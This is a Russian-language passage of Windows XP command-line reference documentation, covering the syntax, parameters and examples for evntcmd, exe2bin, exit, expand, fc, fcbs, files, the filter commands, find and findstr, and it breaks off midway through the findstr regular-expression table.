<p>evntcmd [/s ИмяКомпьютера] [/v УровеньОбъемаСведений] [/n] ИмяФайла<br />Параметры</p> <p>/s ИмяКомпьютера<br />&#160; &#160; Имя компьютера, на котором требуется настроить преобразование событий в ловушки и/или адреса назначения ловушки. Если компьютер не указан, настройка производится на локальном компьютере.<br />/v УровеньОбъемаСведений<br />&#160; &#160; Типы сообщений состояния, отображающиеся в качестве настроенных ловушек и адресов назначения ловушек. Данный параметр должен быть целым числом от 0 до 10. Если указано число 10, то отображаются все типы сообщений, включая сообщения отслеживания и предупреждения о настройке ловушки. Если указано число 0, сообщения не отображаются.<br />/n<br />&#160; &#160; Служба SNMP не должна перезапускаться, если на данный компьютер получены изменения настройки ловушки.<br />ИмяФайла<br />&#160; &#160; Имя файла, который содержит сведения о преобразовании событий в настраиваемые ловушки и адреса назначения ловушки.<br />/?<br />&#160; &#160; Отображает справку в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Если требуется настроить ловушки, но не адреса назначения ловушки, можно создать допустимый файл конфигурации с помощью трансляции событий в ловушки, которая является графической утилитой. Если установлена служба SNMP, трансляцию событий в ловушки можно запустить, набрав в командной строке evntwin. После определения необходимых ловушек нажмите кнопку Экспорт, чтобы создать файл, который можно использовать с evntcmd. Трансляцию событий в ловушки можно использовать для легкого создания файла конфигурации и последующего использования файла конфигурации с evntcmd в командной строке для быстрой настройки ловушек на нескольких компьютерах.<br />&#160; &#160; * Для настройки ловушки используется следующий синтаксис:</p> <p>&#160; &#160; &#160; #pragma ADD ФайлЖурналаСобытий ИсточникСобытия КодСобытия [Счетчик [Период]]<br />&#160; &#160; &#160; &#160; &#160; o текст #pragma должен отображаться в начале каждой записи в файле;<br />&#160; &#160; &#160; &#160; &#160; o параметр ADD указывает, что требуется добавить событие в настройку ловушки;<br />&#160; &#160; &#160; &#160; &#160; o параметры ФайлЖурналаСобытий, ИсточникСобытия и КодСобытия являются обязательными. Параметр ФайлЖурналаСобытий указывает файл, в который записывается событие. Параметр ИсточникСобытия указывает приложение, которое создает событие. Параметр КодСобытия указывает уникальный номер, определяющий каждое событие. Чтобы определить, какие значения соответствуют конкретному событию запустите трансляцию событий в ловушки, набрав в командной строке evntwin. Нажмите кнопку Настройка, а затем кнопку Изменить. В области Источники событий просмотрите папки, пока не найдете событие, которое требуется настроить, щелкните событие, а затем нажмите кнопку Добавить. Сведения об источнике события, файл журнала события и код события соответственно отображаются в областях Источник, Журнал и Код ловушки;<br />&#160; &#160; &#160; &#160; &#160; o параметр Счетчик является необязательным; он указывает количество событий перед отправкой сообщения ловушки. Если параметр Счетчик не используется, сообщения ловушки отправляется после первого событие;<br />&#160; &#160; &#160; &#160; &#160; o параметр Период является необязательным, но он требует использования параметра Счетчик. Параметр Период указывает продолжительность времени (в секундах), в течение которого событие должно произойти число раз, указанное в параметре Счетчик, перед отправкой сообщения ловушки. Если параметр Период не используется, сообщение ловушки отправляется после того, как событие произойдет число раз, указанное в параметре Счетчик, не зависимо от того, сколько времени прошло между событиями.<br />&#160; &#160; * Для удаления ловушки используется следующий синтаксис:</p> <p>&#160; &#160; &#160; #pragma DELETE ФайлЖурналаСобытий ИсточникСобытия КодСобытия<br />&#160; &#160; &#160; &#160; &#160; o текст #pragma должен отображаться в начале каждой записи в файле;<br />&#160; &#160; &#160; &#160; &#160; o параметр DELETE указывает, что требуется удалить событие из настройки ловушки;<br />&#160; &#160; &#160; &#160; &#160; o параметры ФайлЖурналаСобытий, ИсточникСобытия и КодСобытия являются обязательными. Параметр ФайлЖурналаСобытий указывает журнал, в который записывается событие. Параметр ИсточникСобытия указывает приложение, которое создает событие. Параметр КодСобытия указывает уникальный номер, определяющий каждое событие.<br />&#160; &#160; * Для настройки адреса назначения ловушки используется следующий синтаксис:</p> <p>&#160; &#160; &#160; #pragma ADD_TRAP_DEST ИмяСообщества НомерУзла<br />&#160; &#160; &#160; &#160; &#160; o текст #pragma должен отображаться в начале каждой записи в файле;<br />&#160; &#160; &#160; &#160; &#160; o параметр ADD_TRAP_DEST указывает, что требуется отправить сообщения ловушки на конкретный узел внутри сообщества;<br />&#160; &#160; &#160; &#160; &#160; o параметр ИмяСообщества указывает по имени сообщество, в которое отправляется сообщение ловушки;<br />&#160; &#160; &#160; &#160; &#160; o параметр НомерУзла указывает по имени или IP-адресу узел, на который требуется отправить сообщения ловушки.<br />&#160; &#160; * Для удаления адреса назначения ловушки используется следующий синтаксис:</p> <p>&#160; &#160; &#160; #pragma DELETE_TRAP_DEST ИмяСообщества НомерУзла<br />&#160; &#160; &#160; &#160; &#160; o текст #pragma должен отображаться в начале каждой записи в файле;<br />&#160; &#160; &#160; &#160; &#160; o параметр DELETE_TRAP_DEST указывает, что не требуется отправлять сообщения ловушки на конкретный узел внутри сообщества;<br />&#160; &#160; &#160; &#160; &#160; o параметр ИмяСообщества указывает по имени сообщество, в которое отправляются сообщения ловушки;<br />&#160; &#160; &#160; &#160; &#160; o параметр НомерУзла указывает по имени или IP-адресу узел, на который не требуется отправлять сообщения ловушки.</p> <p>Примеры</p> <p>Следующие примеры показывают записи в файле конфигурации для команды evntcmd. Они не могут быть введены в командной строке.</p> <p>Чтобы отправить сообщение ловушки, если служба журнала событий перезапускается, введите:</p> <p>#pragma ADD System &quot;Eventlog&quot; 2147489653</p> <p>Чтобы отправить сообщение ловушки, если служба журнала событий перезапускается дважды за три минуты, введите:</p> <p>#pragma ADD System &quot;Eventlog&quot; 2147489653 2 180</p> <p>Чтобы остановить отправку сообщения ловушки, когда бы ни перезапускалась служба журнала событий, введите:</p> <p>#pragma DELETE System &quot;Eventlog&quot; 2147489653</p> <p>Чтобы отправить сообщения ловушки в сообщество с названием «Public» на узел с IP-адресом 192.168.100.100, введите:</p> <p>#pragma ADD_TRAP_DEST public 192.168.100.100</p> <p>Чтобы отправить сообщения ловушки в сообщество с названием «Private» на узел с названием «Host1», введите:</p> <p>#pragma ADD_TRAP_DEST private Host1</p> <p>Чтобы остановить отправку сообщений ловушки в сообщество с названием «Private» на тот же компьютер, на котором настраиваются адреса назначений ловушки, введите:</p> <p>#pragma DELETE_TRAP_DEST private localhost</p> <p>========================================================================================<br />Exe2bin</p> <p>Преобразование исполняемых файлов (.exe) в двоичный формат.<br />Синтаксис</p> <p>exe2bin [диск1:][путь1]ФайлВвода [[диск2:][путь2]ВыходнойФайл]<br />Параметры</p> <p>[диск1:][путь1]ФайлВвода<br />&#160; &#160; Местонахождение и имя файла ввода, который требуется преобразовать. Параметр ФайлВвода является обязательным.<br />[диск2:][путь2]ВыходнойФайл<br />&#160; &#160; Местонахождение и имя выходного файла, который требуется создать. <br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; *<br />&#160; &#160; *<br />&#160; &#160; * Программа Exe2bin включена для помощи разработчикам программ. Она не предназначена для обычных пользователей.<br />&#160; &#160; * При использовании команды exe2bin имеют место следующие ограничения:<br />&#160; &#160; &#160; &#160; &#160; o входной файл должен быть в корректном .exe формате, полученном после компоновки и не должен быть упакованным;<br />&#160; &#160; &#160; &#160; &#160; o резидентная или действующая (код и данные) часть файла не должны превышать объема в 64Кб;<br />&#160; &#160; &#160; &#160; &#160; o в файле не должно быть сегмента stack.<br />&#160; &#160; * Программа Exe2bin выполняет конкретные действия, в зависимости от значений параметров ФайлВвода и ВыходнойФайл:<br />&#160; &#160; &#160; &#160; &#160; o по умолчанию для параметра ФайлВвода используется расширение .exe. Программа Exe2bin преобразует ФайлВвода .exe в файл с двоичным форматом .bin (образ программы в памяти) и использует местоположение и имя, заданные параметрами [диск2:][путь2]ВыходнойФайл для хранения выходного файла;<br />&#160; &#160; &#160; &#160; &#160; o если не заданы диск2 или путь2, программа exe2bin записывает выходной файл на текущий диск и в текущий каталог;<br />&#160; &#160; &#160; &#160; &#160; o если имя файла для параметра ВыходнойФайл не указано, программа exe2bin использует имя файла параметра ФайлВвода;<br />&#160; &#160; &#160; &#160; &#160; o по умолчанию для имени файла, указанного для параметра ВыходнойФайл, используется расширение .bin.<br />&#160; &#160; * Поддерживаются следующие типы преобразования:<br />&#160; &#160; &#160; &#160; &#160; o если значения CS:IP не заданы в .exe файле, exe2bin выполняет чисто двоичное преобразование. Если программа содержит инструкции, требующие отзыва сегмента, exe2bin запрашивает значение исправления. Это значение исправления является абсолютным адресом сегмента, в который должна быть загружена программа. Итоговая программа может быть использована, только будучи загруженной по этому адресу, задаваемому вызывающей программой. Командный интерпретатор не сможет загрузить такую программу;<br />&#160; &#160; &#160; &#160; &#160; o если значения сегментов CS:IP установлены в 0000:100H, итоговый двоичный файл будет вызываться как .com файл с указателем инструкций, установленным в 100H ассемблерной командой ORG. Включите расширение .com в параметр ВыходнойФайл. Исправления сегментов не разрешены, поскольку файлы с расширением .com должны иметь возможность перемещения сегментов. Файлы с расширением .com должны принимать условия ввода, изложенные в документации Microsoft Macro Assembler. Командный интерпретатор будет загружать и запускать программу так же, как и обычные .com программы, поставляемые на диске Windows XP.</p> <p>========================================================================================<br />Exit</p> <p>Выход из текущего пакетного сценария или из программы Cmd.exe (командный интерпретатор) и возвращение в программу, запустившую Cmd.exe или в диспетчер программ.<br />Синтаксис</p> <p>exit [/b] [КодВыхода]<br />Параметры</p> <p>/b<br />&#160; &#160; Выход из текущего пакетного сценария. <br />КодВыхода<br />&#160; &#160; Число.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Если /b используется вне пакетного сценария, то выход осуществляется из Cmd.exe.<br />&#160; &#160; * Если используется /b, то Cmd.exe устанавливает ERRORLEVEL в указанный КодВыхода. При выходе из Cmd.exe, Cmd.exe устанавливает код процесса выхода вместе с параметром КодВыхода.</p> <p>========================================================================================<br />Expand</p> <p>Восстановление одного или нескольких сжатых файлов. Эта команда используется для развертывания уплотненных файлов с дистрибутивных дисков.<br />Синтаксис</p> <p>expand [-r] Источник [Результат]</p> <p>expand -d источник.cab [-f:файлы]</p> <p>expand источник.cab -f:файлы Результат<br />Параметры</p> <p>-r<br />&#160; &#160; Переименовывает развернутые файлы.<br />-d<br />&#160; &#160; Выводит список файлов в местоположении источника. Не производит распаковки или выделения файлов.<br />-f:файлы<br />&#160; &#160; Указывает файлы в cab-файле, которые необходимо распаковать. Можно использовать подстановочные символы (* and ?).<br />Источник<br />&#160; &#160; Задает файл, который должен быть развернут. Параметр источник может состоять из имени диска с двоеточием, имени папки, имени файла или их комбинации. Можно использовать подстановочные символы (* and ?).<br />Назначение<br />&#160; &#160; Задает, куда помещать развернутые файлы. Если параметр Источник задает несколько файлов и ключ -r не задан, Результат должен быть каталогом. Параметр результат может состоять из имени диска с двоеточием, имени каталога, имени файла или их комбинации.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Использование команды expand в консоли восстановления</p> <p>&#160; &#160; &#160; Команда expand с другими параметрами доступна в консоли восстановления.</p> <p>========================================================================================<br />Fc</p> <p>Сравнение двух файлов и вывод различий между ними.<br />Синтаксис</p> <p>fc [/a] [/b] [/c] [/l] [/lbn] [/n] [/t] [/u] [/w] [/nnnn] [диск1:][путь1]имяфайла1 [диск2:][путь2]имяфайла2<br />Параметры</p> <p>/a<br />&#160; &#160; Задает сокращенный вывод ASCII сравнения. Вместо вывода фсех различающихся строк, fc выводит только начальную и конечную строки отличающихся участков.<br />/b<br />&#160; &#160; Сравнивает файлы в двоичном режиме. Команда fc сравнивает два файла байт за байтом и не пытается сопоставить файлы после найденного отличия. Этот режим используется по умолчанию для сравнения файлов с расширениями: .exe, .com, .sys, .obj, .lib или .bin.<br />/c<br />&#160; &#160; Сравнивает без учета заглавных и строчных букв.<br />/l<br />&#160; &#160; Сравнивает файлы в текстовом (ASCII) режиме. Команда fc сравнивает два файла строка за строкой и пытается сопоставить их, после того как найдено отличие. Этот режим используется по умолчанию для сравнения файлов, исключая файлы со следующими расширениями: .exe, .com, .sys, .obj, .lib или .bin.<br />/lbn<br />&#160; &#160; Задает количество строк n для внутреннего буфера. По умолчанию длина буфера составляет 100 строк. Если количество отличающихся строк в сравниваемых файлах превышает это число, команда fc прекращает сравнение.<br />/n<br />&#160; &#160; Задает вывод номеров строк при сравнении в текстовом режиме.<br />/t<br />&#160; &#160; Предотвращение fc от преобразования меток табуляции в пробелы. По умолчанию табуляторы заменяются пробелами с остановкой в каждой восьмой позиции.<br />/u<br />&#160; &#160; Задает сравнение файлов в текстовом формате Юникод.<br />/w<br />&#160; &#160; Задает сжатие пробелов и табуляций при сравнении. Если в строке содержится несколько пробелов или табуляций подряд, при использовании ключа /w они будут рассматриваться как один. Когда используется ключ /w, программа fc игнорирует (и не сравнивает) пробелы и табуляции в начале и в конце строки.<br />/nnnn<br />&#160; &#160; Задает количество совпадающих строк, используемых программой fc при новом сопоставлении файлов. Если количество совпадающих строк в файле меньше nnnn, программа fc будет выводить совпадающие строки как отличающиеся. По умолчанию значение равно 2.<br />[диск1:][путь1]имяфайла1<br />&#160; &#160; Задает местоположение и имя первого файла для сравнения. Параметр имяфайла1 является обязательным.<br />[диск2:][путь2]имяфайла2<br />&#160; &#160; Задает местоположение и имя второго файла для сравнения. Параметр имяфайла2 является обязательным.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Вывод различий между файлами при текстовом сравнении в формате ASCII</p> <p>&#160; &#160; &#160; При использовании программы fc для сравнения ASCII, fc отображает различия между двумя файлами в следующем порядке:<br />&#160; &#160; &#160; &#160; &#160; o имя первого файла;<br />&#160; &#160; &#160; &#160; &#160; o строки из параметра имяфайла1, которые отличаются в файлах;<br />&#160; &#160; &#160; &#160; &#160; o первая строка, совпадающая в обоих файлах;<br />&#160; &#160; &#160; &#160; &#160; o имя второго файла;<br />&#160; &#160; &#160; &#160; &#160; o отличающиеся строки из параметра имяфайла2;<br />&#160; &#160; &#160; &#160; &#160; o первая строка совпадения.<br />&#160; &#160; * Использование /b для двоичного сравнения</p> <p>&#160; &#160; &#160; /b отображает несоответствия, найденные в течение двоичного сравнения, как показано ниже.</p> <p>&#160; &#160; &#160; xxxxxxxx: yy zz</p> <p>&#160; &#160; &#160; Величина xxxxxxxx задает относительный шестнадцатеричный адрес пары различающихся байтов, отсчитываемый от начала файла. Адресация начинается с 00000000. Шестнадцатеричные величины yy и zz представляют различающиеся байты из имяфайла1 и имяфайла2 соответственно.<br />&#160; &#160; * Использование подстановочных знаков</p> <p>&#160; &#160; &#160; Можно использовать подстановочные знаки (* and ?) в параметрах имяфайла1 и имяфайла2. Если они использованы при задании первого файла имяфайла1, программа fc будет сравнивать все заданные файлы с файлом, указанным в параметре ИмяФайла. Если подстановочные знаки использованы при задании файла имяфайла2, fc при сравнении будет использовать соответствующие значения параметра имяфайла1.<br />&#160; &#160; * Работа с памятью</p> <p>&#160; &#160; &#160; При сравнении в текстовом режиме программа fc использует внутренний буфер (достаточный для размещения 100 строк). Если размер файлов больше размера буфера, программа fc будет сравнивать те части, которые поместились в буфер. Если fc не обнаруживает совпадения в загруженных частях файлов, программа остановится и будет выведено следующее сообщение:</p> <p>&#160; &#160; &#160; Не удается выполнить синхронизацию строк. Слишком много различий между файлами.</p> <p>&#160; &#160; &#160; Если же выполняется двоичное сравнение и размер файлов превосходит размер доступной памяти, fc выполняет сравнение полностью. При необходимости, файлы будут считываться с диска по частям. Вывод команды при этом не будет отличаться от вывода в случае полного размещения файлов в памяти.</p> <p>Примеры</p> <p>Чтобы сравнить два текстовых файла с именами Monthly.rpt и Sales.rpt и вывести результат в сокращенном формате, введите:</p> <p>fc /a monthly.rpt sales.rpt</p> <p>Для двоичного сравнения двух пакетных файлов Profits.bat и Earnings.bat введите:</p> <p>fc /b profits.bat earnings.bat</p> <p>Результат будет иметь следующий вид:</p> <p>00000002: 72 43<br />00000004: 65 3A<br />0000000E: 56 92<br />00000012: 6D 5C<br />00000013: 0D 7C<br />00000014: 0D 0A<br />00000015: 0A 0D<br />0000001E: 43 7A<br />0000001F: 09 0A<br />00000022: 72 44<br />...<br />...<br />...<br />000005E0: 00 61<br />000005E1: 00 73<br />000005E2: 00 73<br />000005E3: 00 69<br />000005E4: 00 67<br />000005E5: 00 6E<br />000005E6: 00 6D<br />000005E7: 00 65<br />000005E8: 00 6E<br />FC: Earnings.bat длиннее, чем Profits.bat</p> <p>Если файлы Profits.bat и Earnings.bat одинаковы, fc выводит на экран следующее сообщение:</p> <p>FC: различия не найдены</p> <p>Для сравнения каждого файла .bat в текущем каталоге с файлом New.bat введите:</p> <p>fc *.bat new.bat</p> <p>Для сравнения файла New.bat на диске C с файлом New.bat на диске D введите:</p> <p>fc c:new.bat d:*.bat</p> <p>Для сравнения каждого пакетного файла в корневом каталоге диска C с файлом с таким же именем в корневом каталоге на диске введите:</p> <p>fc c:*.bat d:*.bat</p> <p>========================================================================================<br />Fcbs</p> <p>Задание числа блоков управления файлом (FCB), которые могут быть одновременно открыты подсистемой MS-DOS. Для указания числа FCB используйте файл системный_корневой_каталог\System32\Config.nt или эквивалентный файл запуска, заданный в PIF-файле.<br />Синтаксис</p> <p>fcbs=x<br />Параметры</p> <p>x<br />&#160; &#160; Обязательный параметр. Задает число блоков управления, которые подсистема MS-DOS может открыть одновременно. Допустимыми являются значения x от 1 до 255. Значение по умолчанию равно 4.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Блок управления файлом является структурой данных, в которой хранится информация о файле.<br />&#160; &#160; * Если программа пытается открыть более x файлов с использованием блоков управления файлом, подсистема MS-DOS может закрыть файлы, которые были открыты ранее.<br />&#160; &#160; * Следует использовать команду fcbs только тогда, когда этого требует какая-либо программа. Большинство современных программ не требуют использования блоков управления файлом. Однако для работы некоторых старых программ требуется поместить команду fcbs в файл Config.nt.</p> <p>Примеры</p> <p>Чтобы разрешить подсистеме MS-DOS открывать до восьми файлов одновременно с использованием блоков управления файлом, в файл Config.nt необходимо включить следующую команду:</p> <p>fcbs=8</p> <p>========================================================================================<br />Files</p> <p>Задание количества файлов, к которым подсистема MS-DOS может иметь доступ одновременно. Для указания параметра файлы используйте файл системный_корневой_каталог\System32\Config.nt или эквивалентный файл запуска, заданный в PIF-файле.<br />Синтаксис</p> <p>files=x<br />Параметры</p> <p>x<br />&#160; &#160; Обязательный параметр. Указание количества файлов, к которым подсистема MS-DOS может иметь доступ одновременно. Допустимыми являются значения x от 8 до 255. Значение по умолчанию равно 8.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Хотя значение по умолчанию x равно 8, некоторые программы требуют большего значения. Типовым значением является 20.</p> <p>Примеры</p> <p>Чтобы разрешить подсистеме MS-DOS иметь доступ одновременно к 20 файлам, в файл Config.nt должна быть включена следующая команда:</p> <p>files=20</p> <p>========================================================================================<br />Использование фильтров</p> <p>Фильтр команды используется с символом перенаправления канала команды (|) и является командой внутри команды, которая считывает ввод команды, преобразовывает ввод, а затем записывает выход. Команды-фильтры дают возможность сортировать, просматривать и отбирать часть выходной информации других команд.</p> <p>Фильтры делят, переупорядочивают или выделяют отдельные части из проходящей через них информации. В приведенной ниже таблице перечислены команды-фильты, доступные в Microsoft Windows XP.<br />Команда Описание<br />more Отображает содержимое файла или вывода команды в одном окне командной строки за раз.<br />find Поиск указанных символов в файлах и выходе команды.<br />sort Сортировка файлов и выхода команды по алфавиту.</p> <p>Для направления данных из файла на вход фильтра используется символ «меньше» (&lt;). Для направления на вход фильтра выхода другой команды используется канал (|).<br />Использование команды more</p> <p>Команда more выводит содержимое файла или выхода команды в одном окне командной строки за раз. Например, чтобы отобразить содержимое файла List.txt в одном окне командной строки за раз, введите следующую команду:</p> <p>more &lt; list.txt</p> <p>Отображается одно окно командной строки со сведениями, а затем в нижней части окна командной строки отображается строка -- More --. Для перехода к следующему окну командной строки, нажмите любую клавишу на клавиатуре, кроме клавиши PAUSE. Для остановки просмотра следует ввести комбинацию CTRL+C.</p> <p>Команда more полезна при работе с командами, создающими выход более одного окна командной строки. Например, при выводе дерева каталогов жесткого диска. Если на диске содержится больше каталогов, чем может быть одновременно выведено в окне командной строки, можно использовать команду tree с каналом (|) и команду more.</p> <p>tree c:\ | more</p> <p>На экран будет выведен первое окно командной строки с выходом команды tree, а затем отобразится строка -- More --. Выход будет ожидать нажатия любой клавиши для продолжения (кроме клавиши PAUSE).<br />Использование команды find</p> <p>Команда find проводит поиск заданной строки или текста в файлах. Команда Cmd.exe отображает каждую строку, которая совпадает со строкой или текстом, указанным в окне коммандной строки. Команда find может быть использована как команда-фильтр и как обычная команда Microsoft Windows XP. Дополнительные сведения об использовании команды find в качестве стандартной команды см. в разделе Find.</p> <p>Чтобы использовать команду find в качестве команды-фильтра, необходимо включить символ «меньше» (&lt;) и строку или текст, в котором требуется выполнить поиск. По умолчанию при поиске команда find учитывает регистр. Например, следующая команда будет искать строку &quot;Pacific Rim&quot; в файле Trade.txt:</p> <p>find &quot;Pacific Rim&quot; &lt; trade.txt</p> <p>Выход не включает вхождение строки &quot;pacific rim&quot;. Встречается вхождение строки &quot;Pacific Rim&quot; с прописными буквами.</p> <p>Для сохранения результатов работы команды find (вместо отображения их в окне командной строки), введите символ «больше» (&gt;) и имя файла, в котором требуется хранить выход. Например, следующая команда ищет строку &quot;Pacific Rim&quot; в файле Trade.txt с сохранением результата в файле Nwtrade.txt:</p> <p>find &quot;Pacific Rim&quot; &lt; trade.txt &gt; nwtrade.txt<br />Использование команды sort</p> <p>Команда sort выполняет сортировку по алфавиту текстового файла или выхода команды. Например, следующая команда сортирует содержимое файла List.txt и отображает результаты в окне командной строки:</p> <p>sort &lt; list.txt</p> <p>В этом примере команда sort сортирует строки файла List.txt в алфавитном порядке и выводит результат на экран без изменения файла. Для сохранения результатов работы команды sort (вместо их отображения) введите символ «больше» (&gt;) и имя файла. Например, следующую команду можно использовать для алфавитной сортировки строк файла List.txt и сохранения результатов в файле Alphlist.txt:</p> <p>sort &lt; list.txt &gt; alphlist.txt</p> <p>Для сортировки вывода команды следует ввести команду, затем символ канала (|) и команду sort (команда | sort). Например, следующая команда сортирует в алфавитном порядке строки, которые содержат слово &quot;Jones&quot; (вывод команды find):</p> <p>find &quot;Jones&quot; maillst.txt | sort<br />========================================================================================<br />Find</p> <p>Поиск заданной строки текста в файле или нескольких файлах. После поиска в заданных файлах команда find выведет на экран все строки из этих файлов, содержащие заданный образец.<br />Синтаксис</p> <p>find [/v] [/c] [/n] [/i] &quot;строка&quot; [[диск:][путь]ИмяФайла[...]]<br />Параметры</p> <p>/v<br />&#160; &#160; Выводит все строки, не содержащие строку, заданную параметром строка.<br />/c<br />&#160; &#160; Подсчет строк, содержащих строку, указанную параметром строка, и отображение общего количества.<br />/n<br />&#160; &#160; Выводит номера строк перед самими строками.<br />/i<br />&#160; &#160; Задает поиск без различия строчных и заглавных букв.<br />&quot;строка_поиска&quot;<br />&#160; &#160; Обязательный параметр. Указывает группу символов, поиск которой будет производиться. Необходимо заключить параметр строка в кавычки (&quot;строка&quot;).<br />[диск:][путь] ИмяФайла<br />&#160; &#160; Задает местоположение и имя файла, в котором будет производиться поиск заданной строки символов.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Задание строки</p> <p>&#160; &#160; &#160; Если ключ /i не указан, команда find ищет именно то, что указано в параметре строка. Например, для команды find символы &quot;a&quot; и &quot;A&quot; являются различными. Если используется ключ /i, команда find не различает строчные и прописные буквы, и символы &quot;a&quot; и &quot;A&quot; являются одинаковыми.</p> <p>&#160; &#160; &#160; Если строка поиска содержит кавычки, при вызове команды каждая кавычка в строке поиска должна быть заменена двумя символами кавычек (&quot;СтрокаСодержания&quot;&quot;Кавычки&quot;).<br />&#160; &#160; * Использование команды find в качестве фильтра</p> <p>&#160; &#160; &#160; Если имя файла пропущено, find действует как фильтр, получая ввод из стандартного источника вывода (обычно клавиатура, канал или файл перенаправления), и выводит все строки, содержащие параметр строка.<br />&#160; &#160; * Порядок синтаксиса команды</p> <p>&#160; &#160; &#160; Параметры и ключи команды find могут быть заданы в произвольном порядке.<br />&#160; &#160; * Использование подстановочных знаков</p> <p>&#160; &#160; &#160; Подстановочные знаки (* и ?) не могут быть использованы в именах файлов и расширениях, задаваемых в команде find. Чтобы искать строку в множестве файлов, указанных с помощью подстановочных знаков, можно использовать команду find в команде for.<br />&#160; &#160; * Использование ключей /v или /n с ключом /c</p> <p>&#160; &#160; &#160; Если в одной команде заданы ключи /c и /v, команда find выведет на экран количество строк, которые не содержат заданную строку поиска. Если в одной команде указаны оба ключа: /c и /n, команда find игнорирует ключ /n.<br />&#160; &#160; * Использование команды find со знаками перевода строки</p> <p>&#160; &#160; &#160; Команда find не распознает символ перевода строки. Когда команда find используется для поиска текста в файле, который содержит символы перевода строки, необходимо ограничить строку поиска текстом, который может быть найден между символами перевода строки (строка не может прерываться символом перевода строки). Например, find не найдет совпадение для строки &quot;файл налогов&quot; если перевод строки в файле стоит между словами &quot;файл&quot; и &quot;налогов&quot;.</p> <p>Примеры</p> <p>Для вывода всех строк из файла Pencil.ad, которые содержат слова «Точилка» служит следующая команда:</p> <p>find &quot;Точилка&quot; pencil.ad</p> <p>Для поиска строки, содержащей текст, указанный в кавычках, необходимо сначала заключить в кавычки всю строку. Во-вторых, необходимо использовать двойные кавычки для каждых кавычек, содержащихся в строке. Поиск Ученый пометил свой документ &quot;&quot;только для дискуссии&quot;&quot;. Это не окончательный отчет.&quot; В Report.doc введите:</p> <p>find &quot;Ученый пометил свой документ &quot;&quot;только для дискуссии.&quot;&quot; Это не окончательный отчет.&quot; report.doc</p> <p>Если поиск требуется провести в нескольких файлах, следует использовать команду find с командой for. Для поиска файлов с расширением .bat, содержащих строку &quot;PROMPT&quot;, можно использовать следующую команду:</p> <p>for %f in (*.bat) do find &quot;PROMPT&quot; %f</p> <p>Для поиска на жестком диске C файлов, содержащих строку &quot;CPU&quot; и отображения их имен используйте символ канала (|), чтобы направить результаты команды dir в команду find:</p> <p>dir c:\ /s /b | find &quot;CPU&quot;</p> <p>Так как команда find проводит поиск, различая строчные и заглавные буквы, а команда dir выводит результаты заглавными буквами, необходимо задать строку &quot;CPU&quot; заглавными буквами или использовать ключ /i в команде find.</p> <p>========================================================================================<br />Findstr</p> <p>Поиск образцов текста в файлах с использованием регулярных выражений.<br />Синтаксис</p> <p>findstr [/b] [/e] [/l] [/r] [/s] [/i] [/x] [/v] [/n] [/m] [/o] [/p] [/offline] [/g:файл] [/f:файл] [/c:строка] [/d:СписокКаталогов] [/a:АтрибутЦвета] [строки] [[диск:][путь] ИмяФайла [...]]<br />Параметры</p> <p>/b<br />&#160; &#160; Сравнивает шаблон с началом строки.<br />/e<br />&#160; &#160; Сравнивает шаблон с концом строки.<br />/l<br />&#160; &#160; Использует заданную строку буквально.<br />/r<br />&#160; &#160; Использует строку поиска как регулярное выражение. Команда Findstr интерпретирует все метасимволы как регулярные выражения, если не используется ключ /l.<br />/s<br />&#160; &#160; Задает поиск файлов в текущем каталоге и его подкаталогах.<br />/i<br />&#160; &#160; Задает поиск без различия строчных и заглавных букв.<br />/x<br />&#160; &#160; Печатает точно совпавшие строки.<br />/v<br />&#160; &#160; Печатает строки, не содержащие совпадений.<br />/n<br />&#160; &#160; Печатает в начале совпавшей строки ее номер.<br />/m<br />&#160; &#160; Печатает только имя файла при обнаружении совпадения.<br />/o<br />&#160; &#160; Печатает смещение перед выводом строки с совпадением.<br />/p<br />&#160; &#160; Пропускает файлы с непечатаемыми символами.<br />/offline<br />&#160; &#160; Обработка файлов с автономным атрибутом.<br />/f:файл<br />&#160; &#160; Читает список из заданного файла.<br />/c:строка<br />&#160; &#160; Использует заданный текст как литеральную строку поиска.<br />/g:файл<br />&#160; &#160; Получает строки поиска из заданного файла.<br />/d:СписокКаталогов<br />&#160; &#160; Ищет в списке каталогов, разделенном запятыми.<br />/a:АтрибутЦвета<br />&#160; &#160; Задает атрибуты цвета двумя шестнадцатеричными цифрами.<br />строки<br />&#160; &#160; Текст, поиск которого производится в файле, заданном параметром ИмяФайла.<br />[диск:][путь] ИмяФайла [...]<br />&#160; &#160; Файл или несколько файлов для поиска.<br />/?<br />&#160; &#160; Отображение справки в командной строке.</p> <p>Заметки</p> <p>&#160; &#160; * Использование регулярных выражений с командой findstr</p> <p>&#160; &#160; &#160; Команда findstr способна выполнять точный поиск текста в любом текстовом файле или файлах формата ASCII. Однако иногда имеется только часть информации, которая должна быть найдена, или требуется найти информацию в широком диапазоне. В таких случаях команда findstr предоставляет мощную возможность поиска с использованием регулярных выражений.</p> <p>&#160; &#160; &#160; В противоположность точному заданию строки символов для поиска, регулярные выражения позволяют задать образец текста. Для задания образца используются литералы и метасимволы. Каждый символ, который не имеет специального значения в регулярных выражениях, рассматривается как литерал и должен точно совпасть при поиске. Например, буквы и цифры являются литеральными символами. Метасимволы — это символы со специальным значением (оператор или разделитель) в регулярных выражениях.</p> <p>&#160; &#160; &#160; В приведенной ниже таблице перечислены метасимволы, допустимые для команды findstr.<br />&#160; &#160; &#160; Символ Значение<br />&#160; &#160; &#160; . Подстановочный знак: любой символ<br />&#160; &#160; &#160; * Повтор: ноль или более предшествующих символов или классов символов.<br />&#160; &#160; &#160; ^ Позиция строки: начало строки<br />&#160; &#160; &#160; $ Позиция строки: конец строки<br />&#160; &#160; &#160; [класс] Класс символа: любой символ из множества<br />&#160; &#160; &#160; [^класс] Инвертированный класс: любой символ из множества<br />&#160; &#160; &#160; [x-y] Диапазон: любой символ из диапазона<br />&#160; &#160; &#160; \x Исключение: использование метасимвола x в качестве литерала<br />&#160; &#160; &#160; \&lt;xyz Позиция слова: начало слова<br />&#160; 